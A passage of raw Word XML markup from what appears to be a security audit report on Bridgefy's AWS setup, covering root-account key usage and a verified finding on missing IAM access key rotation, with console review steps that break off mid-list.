      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="2402" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="95"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>| access_key_1_last_rotated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="2402" w:val="left" w:leader="none"/>
          <w:tab w:pos="5173" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="484987904">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1497285</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>95332</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="880110" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="96" name="Graphic 96"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="96" name="Graphic 96"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="880110" cy="1270"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="l" t="t" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="880110" h="0">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="879798" y="0"/>
                              </a:lnTo>
                            </a:path>
                          </a:pathLst>
                        </a:custGeom>
                        <a:ln w="9144">
                          <a:solidFill>
                            <a:srgbClr val="323232"/>
                          </a:solidFill>
                          <a:prstDash val="dash"/>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8328576" from="117.896477pt,7.506476pt" to="187.17191pt,7.506476pt" stroked="true" strokeweight=".72pt" strokecolor="#323232">
                <v:stroke dashstyle="dash"/>
                <w10:wrap type="none"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="484988416">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2565606</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>95332</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1571625" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="97" name="Graphic 97"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="97" name="Graphic 97"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1571625" cy="1270"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="l" t="t" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="1571625" h="0">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1571067" y="0"/>
                              </a:lnTo>
                            </a:path>
                          </a:pathLst>
                        </a:custGeom>
                        <a:ln w="9144">
                          <a:solidFill>
                            <a:srgbClr val="323232"/>
                          </a:solidFill>
                          <a:prstDash val="dash"/>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8328064" from="202.016251pt,7.506476pt" to="325.722381pt,7.506476pt" stroked="true" strokeweight=".72pt" strokecolor="#323232">
                <v:stroke dashstyle="dash"/>
                <w10:wrap type="none"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| &lt;root_account&gt; | 2020-07-08 17:51:08+00:00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="373"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to create administrative personal accounts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>149</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> and use the root account only in case of emergency.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>All</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>active</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>should</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>removed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>right</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>after the urgent task was completed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250023" w:id="32"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-027</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP4/5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Missing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>IAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Rotation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="FF9900"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="372"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix Verified. The Bridgefy team resolved this issue and 7ASecurity verified that the fix is valid.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was found that the AWS root accounts, as well as </w:t>
      </w:r>
      <w:hyperlink r:id="rId226">
        <w:r>
          <w:rPr>
            <w:i/>
          </w:rPr>
          <w:t>miguel@bridgefy.me</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>have access keys older than recommended. Additionally </w:t>
      </w:r>
      <w:hyperlink r:id="rId226">
        <w:r>
          <w:rPr>
            <w:i/>
          </w:rPr>
          <w:t>miguel@bridgefy.me</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>has never used his access key. AWS access keys grant API access to the infrastructure. In a worst case scenario, attackers able to read old access keys (i.e. from an old repository or a compromised laptop), might trivially compromise the whole infrastructure environment, as no adequate access key rotation is in place. Additionally, during the documentation review, no process for access key rotation was observed. This issue was confirmed as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Resources:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>292595537002</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(bridgefy)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>PoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="128"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487624192">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>243071</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="98" name="Graphic 98"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="98" name="Graphic 98"/>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9.139477pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15692288;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape75" coordorigin="1440,383" coordsize="2880,0" path="m1440,383l4320,383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2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>149</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="61"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId215">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://docs.aws.amazon.com/accounts/latest/reference/best-practices-root-user.htm</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>l</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BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>steps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>followed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>review</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>old</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>keys:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="96" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Navigate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>IAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>view,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Management</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>URL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:hyperlink r:id="rId219">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://us-east-1.console.aws.amazon.com/iamv2/home?#/users</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Review</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
